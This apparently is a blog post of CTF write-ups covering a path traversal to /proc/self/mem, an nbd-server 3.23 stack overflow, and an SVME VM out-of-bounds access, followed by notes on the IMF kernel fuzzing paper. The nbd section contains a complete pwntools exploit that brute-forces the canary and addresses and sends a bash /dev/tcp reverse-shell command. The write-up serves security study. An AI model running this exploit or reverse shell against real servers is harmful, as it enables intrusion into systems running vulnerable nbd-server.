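        # so it walks out of the rootfs directory.
        fd = open_like_ql_file("../secret.txt", dir_fd=root_fd)
        leaked = os.read(fd, 100)
        os.close(fd)
    finally:
        os.close(root_fd)

print(leaked)
```

Nothing in the dir_fd branch confines the lookup to the rootfs, which is why the guest-side test with openat and a long "../" prefix works.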

Let's try it:

#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <iostream>

using namespace std;

int main() {
    int root_fd = open("/", O_RDONLY);
    int mem_fd = openat(root_fd, "../../../../proc/self/mem", O_RDWR, 0);

    return 0;
}

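Both SYS_openat calls succeed, so directory traversal works.

Once we can traverse directories, we can try to read and write arbitrary files.

Since the flag can only be obtained by executing /readflag, we can try to read and write /proc/self/mem.

That file exposes the memory of the process; modifying it is equivalent to modifying the process's virtual address space directly, so we can try to place our own shellcode in a code segment and get it executed.

Note that the file cannot simply be read from the start: unmapped regions are unreadable, so the read offset has to be chosen from the mapping information in /proc/self/maps.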
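Picking offsets from /proc/self/maps boils down to parsing its lines. Below is a small sketch of such a parser; the sample text is fabricated for illustration (addresses, inode and the python3.8 path are assumptions, not values from the remote machine).

```python
def parse_maps(text):
    """Parse /proc/<pid>/maps text into a list of region dicts."""
    regions = []
    for line in text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        start_s, end_s = fields[0].split("-")
        regions.append({
            "start": int(start_s, 16),
            "end": int(end_s, 16),
            "perms": fields[1],
            "offset": int(fields[2], 16),
            "path": fields[5].strip() if len(fields) > 5 else "",
        })
    return regions


# Fabricated sample, shaped like real maps output.
sample = """\
55d0c0a00000-55d0c0a5d000 r--p 00000000 08:01 1234 /usr/bin/python3.8
55d0c0a5d000-55d0c0d00000 r-xp 0005d000 08:01 1234 /usr/bin/python3.8
7ffc1b2e0000-7ffc1b301000 rw-p 00000000 00:00 0 [stack]
"""

regions = parse_maps(sample)
python_regions = [r for r in regions if "python" in r["path"]]
base = min(r["start"] for r in python_regions)           # image base
exec_regions = [r for r in python_regions if "x" in r["perms"]]
print(hex(base), hex(exec_regions[0]["start"]))
```

With the base address known, a GOT offset taken from the dumped binary can be turned into an absolute address, and any region from exec_regions is a candidate place for shellcode written through /proc/self/mem.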

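4. Exploitation flow

The exploitation flow is as follows:

First run: read /proc/self/exe to dump the remote python binary to the local machine and obtain the relative offset of its GOT.
Second run: read /proc/self/maps:
- Obtain the base address of the remote python program and add the relative GOT offset to get the absolute address of the GOT.
- Obtain the address of an executable code segment of the remote python program and write the shellcode into it.
- Overwrite a GOT entry with the shellcode address, then trigger the function whose GOT entry was modified so that python executes the shellcode.

The exploitation of this challenge is fairly simple, so the exp is skipped.

III. Who Moved My Block

1. wmmb challenge description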

On Linux, network block device (NBD) is a network protocol that can be used to forward a block device (typically a hard disk or partition) from one machine to a second machine. As an example, a local machine can access a hard disk drive that is attached to another computer.
https://github.com/NetworkBlockDevice/nbd
nc 47.242.113.232 31337
attachment

Clone-and-Pwn, difficulty:baby

2. wmmb environment setup

Check which protections the provided binary has enabled (wow, they really are all on):

Download the source and build it:

wget https://versaweb.dl.sourceforge.net/project/nbd/nbd/3.23/nbd-3.23.tar.gz
tar -xvf nbd-3.23.tar.gz
cd nbd-3.23
./configure --enable-debug
# Enable Full RELRO, Canary, NX and PIE at build time
make "CFLAGS += -fstack-protector-all -pie -z now -z noexecstack"
# make install

./nbd-server 0.0.0.0:10809 ${PWD}/../WhoMovedMyBlock/container/rootfs.ext2
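# Note: when run directly, nbd-server prints its messages and then the **foreground process** immediately daemonizes, handing control back to the shell
# The process keeps running in the background and can be found with:
ps -ax | grep "nbd"

When debugging, if you don't want the process to daemonize, add this flag when running make: make "CFLAGS += -DNODAEMON"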

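3. Vulnerability

a. Finding the vulnerabilities

The remote machine runs an nbd-server, so clearly we need to connect to it and try to craft malicious fields in the payload we send.

That means auditing the code (in nbd-3.23/nbd-server.c) for a path of the form untrusted input -> no filtering -> memory access.

We start from accept, the starting point of every socket connection. Following its cross-references leads to the connection handler handle_modern_connection: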

static void
handle_modern_connection(GArray *const servers, const int sock, struct generic_conf *genconf)
{
    [...]
    net = socket_accept(sock);
    if (net < 0)
        return;
    
    if (!dontfork) {
        // Important: a child process is forked here to handle the new connection on its own
        pid = spawn_child(&commsocket);
        if (pid) {
            if (pid > 0) {
                msg(LOG_INFO, "Spawned a child process");
                g_array_append_val(childsocks, commsocket);
            }
            if (pid < 0)
                msg(LOG_ERR, "Failed to spawn a child process");
            close(net);
            return;
        }
        /* Child just continues. */
    }
    [...]
    
    // Negotiate the connection
    client = negotiate(net, servers, genconf);
       
    [...]
       
    msg(LOG_INFO, "Starting to serve");

    // Start serving
    mainloop_threaded(client);
    exit(EXIT_SUCCESS);
handler_err:
    [...]
}

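Note that by default the server forks a new child process for every connection. This is very important: each child inherits the parent's canary and address-space layout, so we can brute-force the canary and PIE one connection at a time.

The function calls negotiate, which creates a CLIENT structure and assigns the fd of the new connection to it. From then on, socket_read(client, addr, len) is used to read data from the client (that is, from us).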

/**
 * Do the initial negotiation.
 *
 * @param net The socket we're doing the negotiation over.
 * @param servers The array of known servers.
 * @param genconf the global options (needed for accessing TLS config data)
 **/
CLIENT* negotiate(int net, GArray* servers, struct generic_conf *genconf) {
    uint16_t smallflags = NBD_FLAG_FIXED_NEWSTYLE | NBD_FLAG_NO_ZEROES;
    uint64_t magic;
    uint32_t cflags = 0;
    uint32_t opt;
    // Create and initialize the client structure
    CLIENT* client = g_new0(CLIENT, 1);
    // Assign the socket fd to the client
    client->net = net;
    client->socket_read = socket_read_notls;
    client->socket_write = socket_write_notls;
    client->socket_closed = socket_closed_negotiate;

    assert(servers != NULL);
    socket_write(client, INIT_PASSWD, 8);
    magic = htonll(opts_magic);
    socket_write(client, &magic, sizeof(magic));

    smallflags = htons(smallflags);
    socket_write(client, &smallflags, sizeof(uint16_t));
    // Read data from the client
    socket_read(client, &cflags, sizeof(cflags));
    cflags = htonl(cflags);
    [...]
}

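So we can search globally for uses of socket_read and audit each of them. The function is not used often, fewer than 20 times, so a manual audit goes quickly. The audit turns up 3 vulnerable spots.

Note that the TLS-related functions were ignored during the audit, because the remote side does not enable TLS.

b. Vulnerabilities

0) codeql

author: sakura.

I also wrote a CodeQL data-flow analysis along the way. Two simple formulations come to mind. One treats the byte-order conversion functions such as htonl as the source and socket_read as the sink, checking for size overflows.

The other treats the second argument of socket_read, where user input is received, as the source, and then checks whether the taint can reach a binary operation or the third argument of socket_read.

The QL below implements the latter.

While writing it I noticed that QL's data-flow analysis is fairly conservative, so some edges have to be connected by hand.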

/**
 * @kind path-problem
 */

import DataFlow::PathGraph
import cpp
import semmle.code.cpp.ir.dataflow.TaintTracking

predicate htonlCallEdge(DataFlow::Node node1, DataFlow::Node node2) {
  exists(FunctionCall fc |
    // fc.getTarget().getName() = "htonl" and
    node1.asExpr() = fc.getAnArgument() and
    node2.asExpr() = fc
  )
}

class MyDataFlowConfiguration extends TaintTracking::Configuration {
  MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" }

  override predicate isSource(DataFlow::Node source) {
    exists(FunctionCall fc | fc.getArgument(1) = source.asExpr() |
      fc.getTarget().hasGlobalName("socket_read")
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    sink.asExpr().getLocation().toString().matches("%nbd-server%") and
    sink.asExpr() instanceof BinaryArithmeticOperation
    // exists(FunctionCall fc | fc.getArgument(2) = sink.asExpr() |
    //   fc.getTarget().hasGlobalName("socket_read")
    // )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) {
    htonlCallEdge(node1, node2)
  }
}

from MyDataFlowConfiguration config, DataFlow::PathNode source, DataFlow::PathNode sink
where config.hasFlowPath(source, sink)
select sink.getNode(), source, sink, ""

1) handle_export_name

A heap overflow caused by an integer overflow sits in handle_export_name:

It allows a heap overflow of arbitrary length.

static CLIENT* handle_export_name(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
    uint32_t namelen;
    char* name;
    int i;
    // Read namelen from the client
    socket_read(client, &namelen, sizeof(namelen));
    namelen = ntohl(namelen);
    if(namelen > 0) {
        // No integer overflow check here: if namelen is 0xffffffff, the size actually passed to malloc is 0,
        // so this leads to a heap overflow
        name = malloc(namelen+1);
        name[namelen]=0;
        socket_read(client, name, namelen);
    } else {
        name = strdup("");
    }
    [...]
}
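The wrap-around is easy to check numerically. The sketch below models the uint32_t arithmetic in Python by masking to 32 bits; malloc_request_size is a hypothetical helper named for this illustration only.

```python
UINT32_MASK = 0xFFFFFFFF


def malloc_request_size(namelen):
    """Size passed to malloc(namelen + 1) when namelen is a uint32_t."""
    return (namelen + 1) & UINT32_MASK   # uint32_t addition wraps modulo 2**32


for namelen in (5, 0xFFFFFFFE, 0xFFFFFFFF):
    size = malloc_request_size(namelen)
    print(f"namelen={namelen:#x} -> malloc({size:#x}), then read {namelen:#x} bytes")
```

For namelen = 0xffffffff the allocation request is 0 bytes while the following socket_read is still asked for 0xffffffff bytes, which is the mismatch that produces the overflow.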

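2) handle_info

This function contains two vulnerable spots. One is a heap overflow similar to the one above:

Again it allows a heap overflow of arbitrary length.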

static bool handle_info(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
    uint32_t namelen, len;
    char *name;
    int i;
    SERVER *server = NULL;
    [...]
    char buf[1024];
    [...]

    socket_read(client, &len, sizeof(len));
    len = htonl(len);
    // 1. Read namelen from the remote side
    socket_read(client, &namelen, sizeof(namelen));
    namelen = htonl(namelen);
    if(namelen > (len - 6)) {
        send_reply(client, opt, NBD_REP_ERR_INVALID, -1, "An OPT_INFO request cannot be smaller than the length of the name + 6");
        socket_read(client, buf, len - sizeof(namelen));
    }
    if(namelen > 0) {
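        // 2. 1 is added without any check, so malloc(0) is executed, causing a heap overflow
        name = malloc(namelen + 1);
        // *. Drawback: heap feng shui is needed to survive the out-of-bounds write at offset 0xffffffff, which may otherwise cause SIGSEGV.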
        name[namelen] = 0;
        socket_read(client, name, namelen);
    } else {
        name = strdup("");
    }
    [...]
}

The other is a stack overflow whose length is not restricted:

static bool handle_info(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
    uint32_t namelen, len;
    char *name;
    int i;
    SERVER *server = NULL;
    [...]
    char buf[1024];
    [...]

    // 1. Read len from the remote side
    socket_read(client, &len, sizeof(len));
    len = htonl(len);
    // 2. Read namelen from the remote side
    socket_read(client, &namelen, sizeof(namelen));
    namelen = htonl(namelen);
    // 3. Enter the if branch
    if(namelen > (len - 6)) {
        send_reply(client, opt, NBD_REP_ERR_INVALID, -1, "An OPT_INFO request cannot be smaller than the length of the name + 6");
        // 4. Read data from the client; len is attacker-controlled, so this can overflow the stack buffer
        socket_read(client, buf, len - sizeof(namelen));
    }
    if(namelen > 0) {
        name = malloc(namelen + 1);
        name[namelen] = 0;
        socket_read(client, name, namelen);
    } else {
        name = strdup("");
    }
    [...]
}
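The condition for reaching the oversized read can be modelled in a few lines. This is a sketch under assumptions: error_path_read_len is a hypothetical helper, `len - 6` is evaluated as 32-bit unsigned arithmetic, and `len - sizeof(namelen)` is evaluated as 64-bit size_t arithmetic (an LP64 target is assumed).

```python
UINT32_MASK = 0xFFFFFFFF
SIZE_T_MASK = 0xFFFFFFFFFFFFFFFF   # assumption: 64-bit size_t
BUF_SIZE = 1024                    # char buf[1024] in handle_info


def error_path_read_len(length, namelen):
    """Bytes read into buf on the error path, or None if the path is not taken."""
    if namelen > ((length - 6) & UINT32_MASK):   # namelen > (len - 6)
        return (length - 4) & SIZE_T_MASK        # len - sizeof(namelen)
    return None


# Same relation the exp uses: len = len(payload) + 4, namelen = len(payload).
payload_len = 0x408 + 8
read_len = error_path_read_len(payload_len + 4, payload_len)
overflows = read_len is not None and read_len > BUF_SIZE
print(read_len, overflows)
```

Choosing len and namelen this way takes the error branch while making the server read exactly len(payload) bytes into the 1024-byte stack buffer, so the overflow length is fully attacker-controlled.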

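4. Exploitation flow

First, connect to the remote side, hand-craft the malicious fields to trigger the stack overflow, and brute-force the canary and PIE; from these compute $addr_{ELF-base}$, $addr_{GOT}$, $addr_{system}$, $addr_{gadgets}$ and so on.
After leaking these, we need to pass the cmd to be executed to system. All data we send is stored on the heap, and cmd is no exception, so we also need to leak a heap address.
The stack frame of handle_info holds a saved old r12 value that points to client, so we can try to brute-force this stack value to obtain a heap address.
Note that we talk to the remote side over a socket, so cmd cannot simply be cat /flag; the stdout of the executed command has to be redirected to the socket fd of our connection.
The simplest way is a reverse shell back to our own host.
Finally, finish everything off with ROP.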
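The byte-by-byte brute force in the first step can be sketched independently of the network code. Here the forking server is replaced by a simulated oracle: make_oracle and brute_force are hypothetical names, and "the child survives" is modelled as "the guessed prefix matches the secret", which is what the canary check effectively provides.

```python
import os


def make_oracle(secret):
    """Simulated server: a guess 'survives' only if it matches the secret prefix."""
    def survives(guess_prefix):
        return secret.startswith(guess_prefix)
    return survives


def brute_force(oracle, length=8, known=b""):
    """Recover `length` bytes one at a time, at most 256 tries per byte."""
    data = known
    while len(data) < length:
        for ch in range(256):
            if oracle(data + bytes([ch])):
                data += bytes([ch])
                break
        else:
            raise RuntimeError("no candidate byte survived; oracle is unreliable")
    return data


secret = b"\x00" + os.urandom(7)     # canaries on Linux start with a NUL byte
recovered = brute_force(make_oracle(secret))
print(recovered.hex())
```

Because the overflow is written byte by byte and each forked child has the same secret, the search costs at most 8 * 256 connections instead of 2**64 guesses.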

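5. Exploit

The exploit for this challenge is rather interesting, so I tried writing it myself:

Note that the offsets used in the exp are those of the self-compiled nbd-server.
Since I enabled the same protections at build time as the remote binary has, the internal offsets of the self-compiled nbd-server and the remote binary are almost identical, and the exp only needs a few offsets changed to work against the remote binary.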

#! python3
from pwn import *
context(
    terminal=['gnome-terminal', '-x', 'bash', '-c'],
    os='linux',
    arch='amd64',
    encoding='latin',
    endian="little",       # Note: network byte order is big-endian
    log_level="info",
)

'''
stack layout:

- 0x400 bytes buf
- 8 bytes unknown field
- canary
- 8 bytes unknown field
- old_rbx
- old_rbp
- old_r12 : client_addr
- old_r13
- old_r14
- old_r15
- return addr
'''

def send_new_request(payload):
    p = remote("127.0.0.1", 10809)
    cmd = b' '*0x25 + b"sleep 5; bash -c \"bash -i >& /dev/tcp/127.0.0.1/8001 0>&1\""
    
    p.send(p32(0, endian="big"))                  # cflags
    p.send(b"IHAVEOPT")                           # opt_magic
    p.send(p32(7, endian="big"))                  # opt: NBD_OPT_GO
    p.send(p32(len(payload) + 4, endian="big"))   # len

    namelen = len(payload)
    p.send(p32(namelen, endian="big"))            # namelen (> (len - 6))
    
    p.send(payload)                               # payload

    padding_len = namelen - len(cmd)
    assert padding_len >= 0
    p.send(cmd + b'\x00'*padding_len)             # name buffer, holds the command argument passed to system

    p.send(p16(0, endian="big"))                  # n_requests

    return p

def exploit_stack_data(payload, target_len=8):
    data = b""
    while len(data) < target_len:
        for ch in range(256):
            p = send_new_request(payload + data + p8(ch))
            p.clean()

            log.info("Getting stack mem: " + \
                hex(int.from_bytes(data,byteorder='little')) + \
                ", ch: " + str(ch))
            try:
                p.recv(timeout=1)
                p.close()
                data += p8(ch)
                break
            except EOFError:
                p.close()
            
    return data
    
if __name__ == '__main__':
    b2i = lambda addr : int.from_bytes(addr,byteorder='little')

    if True:
        canary = p64(0x5af9ebae046ded00)
        client_addr = p64(0x555cbd36c9b0)
        ret_addr = p64(0x555cbbb901b7)
    else:
        canary = None
        client_addr = None
        ret_addr = p8(0xb7) # Manually fix the lowest byte to make the brute force more reliable
    ret_addr_offset = 0x91B7

    if canary is None:
        canary = exploit_stack_data(b'a'*0x408, target_len=8)
        log.info("=================================")
        log.success("canary: " + hex(b2i(canary)))
        input()

    if client_addr is None:
        client_addr = exploit_stack_data(b'a'*0x408 + canary + b'b'*0x18, target_len=8)
        log.info("=================================")
        log.success("client addr: " + hex(b2i(client_addr)))
        input()

    if len(ret_addr) < 8:
        ret_addr += exploit_stack_data(
            b'a'*0x408 + canary + b'b'*0x18 + client_addr + b'c'*0x18 + ret_addr, target_len=7)
        log.info("=================================")
        log.success("ret addr: " + hex(b2i(ret_addr)))
        input()

    elf = ELF("./nbd-server")
    elf.address = b2i(ret_addr) - ret_addr_offset
    log.success("ELF base addr: " + hex(elf.address))
    assert elf.address & 0xfff == 0

    elf_rop = ROP(elf)
    elf_rop.system(b2i(client_addr) + 0x180)
    print(elf_rop.dump())

    log.info("Try getting reverse shell")
    p = send_new_request(b'a'*0x408 + canary + b'b'*0x18 + client_addr + b'c'*0x18 + elf_rop.chain())
    p.interactive()

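The main pitfall is the brute force. It is the heart of the whole exp, but guesses for the low-address bytes easily produce false positives, so it is best to repeat the brute force several times. Three pieces of data need to be brute-forced:

Canary: a single wrong byte aborts immediately, which is good for brute forcing; this is the easiest value to recover.
Return address: the lowest byte has to be specified manually to make the brute force more reliable. The value of that lowest byte can be read from IDA (note that pages are aligned to 0x1000).
Client address: when handle_info is called, the caller's client address is pushed onto the stack (old r12), so a pop r12 is executed before leaving handle_info. We can brute-force this r12 value to obtain the client address, and from it derive, by relative offset, the address of the name buffer that stores the system command.
Notes
- The program uses socket_read a lot, and that function goes through function pointers stored in client, so a client address that is off by even one byte causes SIGSEGV; this is good for brute forcing.
- In practice, however, the client address is quite prone to false positives and has to be checked carefully.

IV. SVME

1. SVME challenge description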

Professor Terence Parr has taught us how to build a virtual machine. Now it's time to break it!
nc 47.243.140.252 1337
attachment

Clone-and-Pwn, Virtual Machine, difficulty:baby

A simple open-source VM, baby difficulty.

2. SVME environment setup

The challenge provides a libc-2.31.so attachment and main.c:

#include <stdbool.h>
#include <unistd.h>
#include "vm.h"

int main(int argc, char *argv[]) {
    int code[128], nread = 0;
    while (nread < sizeof(code)) {
        int ret = read(0, code+nread, sizeof(code)-nread);
        if (ret <= 0) break;
        nread += ret;
    }
    VM *vm = vm_create(code, nread/4, 0);
    vm_exec(vm, 0, true);
    vm_free(vm);
    return 0;
}

Run the following commands to set up the environment:

git clone git@github.com:parrt/simple-virtual-machine-C.git
cp ./main.c ./simple-virtual-machine-C/src/vmtest.c
cd simple-virtual-machine-C
cmake .
make

3. Vulnerability

First, the layout of the VM structure can be seen at #L40:

typedef struct {
    int returnip;
    int locals[DEFAULT_NUM_LOCALS];
} Context;

typedef struct {
    int *code;
    int code_size;

    // global variable space
    int *globals;
    int nglobals;

    // Operand stack, grows upwards
    int stack[DEFAULT_STACK_SIZE];
    Context call_stack[DEFAULT_CALL_STACK_SIZE];
} VM;

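From main.c we know that in the created VM structure, the code field points to the stack and the globals field points to the heap.

In the handlers of the LOAD and STORE opcodes, we can read and write at an arbitrary offset relative to the VM structure (note that the structure lives on the heap), because offset is never bounds-checked.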

case LOAD: // load local or arg
    offset = vm->code[ip++];
    vm->stack[++sp] = vm->call_stack[callsp].locals[offset];
    break;
[...]
case STORE:
    offset = vm->code[ip++];
    vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
    break;

Likewise, the GLOAD and GSTORE opcodes let us read and write at an arbitrary offset relative to the memory that the globals pointer points to.

case GLOAD: // load from global memory
    addr = vm->code[ip++];
    vm->stack[++sp] = vm->globals[addr];
    break;
case GSTORE:
    addr = vm->code[ip++];
    vm->globals[addr] = vm->stack[sp--];
    break;

With these opcodes we can leak pointers and read and write arbitrary memory, then overwrite the free hook in libc and hijack control flow when the VM exits.
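To see which locals index reaches the globals and code pointers, the struct layout can be modelled with ctypes. This is a sketch under assumptions: the three DEFAULT_* constants are assumed values for illustration (check vm.h for the real ones), locals_index_for is a hypothetical helper, and the value of callsp at the time of the access depends on interpreter state, so it is left as a parameter.

```python
import ctypes

# Assumed sizes for illustration only; the real values are defined in vm.h.
DEFAULT_STACK_SIZE = 1000
DEFAULT_CALL_STACK_SIZE = 1000
DEFAULT_NUM_LOCALS = 10


class Context(ctypes.Structure):
    _fields_ = [
        ("returnip", ctypes.c_int),
        ("locals", ctypes.c_int * DEFAULT_NUM_LOCALS),
    ]


class VM(ctypes.Structure):
    _fields_ = [
        ("code", ctypes.POINTER(ctypes.c_int)),
        ("code_size", ctypes.c_int),
        ("globals", ctypes.POINTER(ctypes.c_int)),
        ("nglobals", ctypes.c_int),
        ("stack", ctypes.c_int * DEFAULT_STACK_SIZE),
        ("call_stack", Context * DEFAULT_CALL_STACK_SIZE),
    ]


def locals_index_for(field_name, callsp):
    """Index i such that call_stack[callsp].locals[i] aliases VM.<field_name>."""
    locals_base = (VM.call_stack.offset
                   + callsp * ctypes.sizeof(Context)
                   + Context.locals.offset)
    delta = getattr(VM, field_name).offset - locals_base
    assert delta % ctypes.sizeof(ctypes.c_int) == 0
    return delta // ctypes.sizeof(ctypes.c_int)


globals_idx = locals_index_for("globals", callsp=0)
code_idx = locals_index_for("code", callsp=0)
print(globals_idx, code_idx)
```

Both indices come out negative because the pointers sit before call_stack in the struct. On a 64-bit target each pointer spans two int slots, so leaking or overwriting one takes two LOAD or STORE operations at consecutive indices.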

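4. Exploitation flow

Use STORE to move VM->stack toward lower addresses, read the globals and code pointer values, save them on vm->call_stack, and then restore VM->stack.
Restoring requires overwriting the globals and code pointers, so take care to write the correct values.
Use the arbitrary read to fetch the libc_start_main return address on the stack, and compute the libc base, free_hook and one_gadget addresses.
Use the arbitrary write to replace the entry at free_hook with one_gadget, hijacking control flow to get a shell.

The exploitation of this challenge is fairly simple, so the exp is skipped.

"IMF: Inferred Model-based Fuzzer" Paper Notes

2022-01-19T16:00:00.000Z

I. Introduction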

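Calls to kernel API functions mostly depend on one another: some API calls need context produced by other API calls. If the supplied context is useless, the kernel API keeps failing and execution never reaches deeper logic.
This paper proposes a new approach to kernel fuzzing. It uses the dependencies between kernel API functions (that is, the similarity of API call sequences) to infer a dependency model, and then uses that model to generate random yet well-structured API sequences for deeper fuzzing.
There are two kinds of dependencies between API calls:
1. Ordering dependency: function A should be called before function B.
2. Data dependency: data flows between function calls.
The main fuzzing target is IOKit Lib.
IMF src - github

Note that this is a 2017 paper and its experiments used MacOS 10.12.3, while my machine runs MacOS 12.0.1, so reproducing the experiments runs into some difficulties.

II. Architecture

The IMF architecture proposed in the paper is as follows:

IMF consists of three parts:

Logger: records the API call log of a given application. The log includes the called function names, the argument values passed in, and similar data.
Inferrer: infers ordering and data dependencies from the API logs produced by the Logger. It first selects, from the L logs produced by the Logger, the N (N < L) logs with the longest common prefix; these N logs are then used to infer dependencies and build the API dependency model.
Fuzzer: uses the inferred API dependency model to generate test cases dynamically and run them.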

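III. Example

The paper gives an example of the fuzzing process, which offers a quick overview of how IMF works end to end.

1. Initial state

At the start, a set of configuration files and an API prototype annotation file are given. The latter stores the names of the target IOKit APIs together with the types and number of their parameters, usually in JSON format.

The API prototype annotation file is mainly used to generate the API hooks and to support API dependency inference.

2. Installing the API hooks

IMF first installs API hooks for the target program, 2048 Game, so that calls from the target into IOKit Lib are hooked and recorded.
It then simulates mouse or keyboard input for the target, so that the target calls IOKit and leaves an API log.
The target program is run in a loop L=1000 times, producing L logs.

Note that when I reproduced the experiment, hooking 2048 Game recorded no IOKit log at all, possibly because of the MacOS version (VSCode did produce logs, but only a few).
I therefore chose /usr/sbin/ioreg as the target program in my experiments.

Each log records, for every API call, 1) the types and values of the input arguments and 2) the type and value of the return value.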

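3. Filtering the API logs

At this point the API hooks have recorded L=1000 logs, and the next step is to filter them down to a subset.

In this example, N=2 logs sharing the longest common prefix are selected from the L=1000 logs.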
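One way to realize this selection is sketched below. It is not the paper's implementation: it represents each log as a list of API names (an assumption) and relies on the fact that, after lexicographic sorting, all sequences sharing a prefix are adjacent, so the best N logs form a contiguous window whose common prefix is that of its first and last element.

```python
def common_prefix_len(a, b):
    """Number of leading elements that two call sequences share."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def select_logs(logs, n):
    """Pick n logs (n <= len(logs)) whose common prefix is as long as possible."""
    ordered = sorted(logs)
    best = max(
        range(len(ordered) - n + 1),
        key=lambda i: common_prefix_len(ordered[i], ordered[i + n - 1]),
    )
    return ordered[best:best + n]


logs = [
    ["IOServiceMatching", "IOServiceGetMatchingService", "IOServiceOpen"],
    ["IOServiceMatching", "IOServiceGetMatchingService", "IOConnectCallMethod"],
    ["IOServiceMatching", "IOObjectRelease"],
    ["IOMasterPort"],
]
selected = select_logs(logs, 2)
print(selected)
```

Sorting once and sliding a window keeps the selection at O(L log L) comparisons instead of trying every N-subset of the L logs.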

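Note that because GUI events are non-deterministic, the hooks may not produce the same API call sequence for the same input to the same GUI program.
If the target is a non-GUI program, however, the generated API logs are largely identical.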

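4. Dependency inference

a. Ordering dependency

IMF first assumes that the order of API calls in the logs should be preserved. This may put unnecessary ordering dependencies into the model, making the ordering relation an over-approximation, but the assumption is relaxed appropriately during actual fuzzing.

The call order obtained at this point is shown below, where $A < B$ means that A is called before B:

$$IOServiceMatching < IOServiceGetMatchingService < IOServiceOpen < IOConnectCallMethod$$

b. Data dependency

Next, working on the N=2 log subset, IMF does the following.

It detects and identifies argument values that are constants. In the figure, green text marks constants, and constant values are excluded from the data-flow analysis:

Note that since an API prototype annotation file was given beforehand, parameters of handle types (such as io_service_t and io_connect_t) are not identified as constants.

It detects data dependencies. If the return value of an earlier call is used as an argument of a later call, the two calls have a data dependency, as indicated by the black dashed lines in the figure.
The paper implements several heuristics for detecting data dependencies; only one of them is briefly described here.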
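The return-value heuristic described above can be sketched as follows. This is a simplification, not IMF's code: calls are plain dicts with name, args and ret (an assumed log shape), all numeric values are made up, and output-pointer parameters are ignored even though real IOKit APIs such as IOServiceOpen return handles through them.

```python
def infer_data_deps(calls, constants=frozenset()):
    """Return (producer, consumer, arg_position) for each matched value."""
    deps = []
    for j, call in enumerate(calls):
        for pos, value in enumerate(call["args"]):
            if value in constants:
                continue                      # constants are excluded from data flow
            # Search backwards so the most recent producer wins.
            for i in range(j - 1, -1, -1):
                if calls[i]["ret"] == value:
                    deps.append((calls[i]["name"], call["name"], pos))
                    break
    return deps


# Made-up values; 0 is treated as a constant.
trace = [
    {"name": "IOServiceMatching", "args": ["IOHIDSystem"], "ret": 0x1000},
    {"name": "IOServiceGetMatchingService", "args": [0, 0x1000], "ret": 0x2607},
    {"name": "IOServiceOpen", "args": [0x2607, 0x103, 0], "ret": 0},
]
deps = infer_data_deps(trace, constants={0})
print(deps)
```

Excluding constants first matters: without it, a ubiquitous value like 0 would link nearly every call that returns success to every later call that takes a zero argument.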

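c. Model generation

The figure below is an API model generated from the figure above; the model is represented as an AST:

In this model, every function call clearly follows the ordering dependency inferred earlier, as well as the value dependencies between functions.

For the relationship between the pointer outStructCnt and the API, IMF can also use the API annotation file given earlier to learn how the two are related, and thus produce code such as line 9.

IMF can then mutate and generate inputs based on the model.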

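IV. Implementation

1. Logger

a. Details from the paper

The Logger has to deal with two questions:

Where does the target program's input come from?
How much data should be recorded in the log?

For the first question: most target programs used in the paper are GUI programs, whose input consists mostly of mouse and keyboard events, so PyUserInput can be used to simulate input events for the target.

For the second question: how many levels of pointer indirection should be saved when logging? Too many levels take up a lot of disk space and make analysis harder, so the paper's experiments save only one level of indirection.

b. Technical details

In the code released with the paper, const.py already records the prototype definitions of the target IOKit APIs. A simple example: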

# const.py
API_DEFS = [
    [
        # kern_return_t IOConnectGetService(io_connect_t connect, io_service_t *service);
        ('kern_return_t', 'IOConnectGetService'), 
        [
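            # First parameter
            ('io_connect_t', 'connect', {}),
            # Second parameter. The third field of a pointer parameter is a dict with an IO key, stating whether data flows into the memory the pointer refers to or out of it in this function; this is used for further data-flow analysis.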
            ('io_service_t *', 'service', {'IO':'O'}) 
        ]
    ],
    ......
]

Then hook.py combines the given IOKit API prototypes with a template of C hook code and generates a hook.c file containing C code like the following:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifndef LOG_PATH
#define LOG_PATH "/tmp/log"
#endif

const char* log_path = LOG_PATH;
// Emit the value in JSON format
void log_CFTypeRef(FILE *f,CFTypeRef target){
  CFTypeID ty = CFGetTypeID(target);
  if (ty == CFStringGetTypeID()){
    fprintf(f,"'%s'",CFStringGetCStringPtr(target,kCFStringEncodingUTF8));
  }else if (ty == CFDictionaryGetTypeID()){
    fprintf(f,"{");
    size_t size = CFDictionaryGetCount(target);
    CFTypeRef *keys = (CFTypeRef *) malloc( size * sizeof(CFTypeRef) );
    CFTypeRef *vals = (CFTypeRef *) malloc( size * sizeof(CFTypeRef) );
    CFDictionaryGetKeysAndValues(target,keys,vals);
    for(size_t i=0;i<size;i++){
      log_CFTypeRef(f,keys[i]);
      fprintf(f,":");
      log_CFTypeRef(f,vals[0]);
      fprintf(f,",");
    
    }
    fprintf(f,"}");
    free(keys);
    free(vals);
  }else if (ty == CFNumberGetTypeID()){
    uint64_t n;
    CFNumberGetValue(target,CFNumberGetType(target),&n);
    fprintf(f,"%d",n);
  }else if (ty == CFBooleanGetTypeID()){
    fprintf(f,"%s",CFBooleanGetValue(target)?"True":"False");
  }else{
    fprintf(f,"log_CFTypeRef ERROR");
    exit(0);
  }
}

// Handler that runs in place of IOCatalogueReset once it is hooked
kern_return_t fake_IOCatalogueReset(mach_port_t masterPort,uint32_t flag){
  FILE *fp = fopen(log_path,"a");
  flock(fileno(fp),LOCK_EX);
  fprintf(fp,"IN ['IOCatalogueReset',");
  if(1) fprintf(fp,"{'name':'masterPort','value': 0x%x,'size' : 0x%lx,'cnt':0x%x, 'data':[",masterPort, sizeof(mach_port_t),1);
  else fprintf(fp,"{'name':'masterPort','value': 0x%x, 'size' : 0x%lx,'cnt':'undefined', 'data':[",masterPort,sizeof(mach_port_t));
  fprintf(fp,"]},");
  if(1) fprintf(fp,"{'name':'flag','value': 0x%x,'size' : 0x%lx,'cnt':0x%x, 'data':[",flag, sizeof(uint32_t),1);
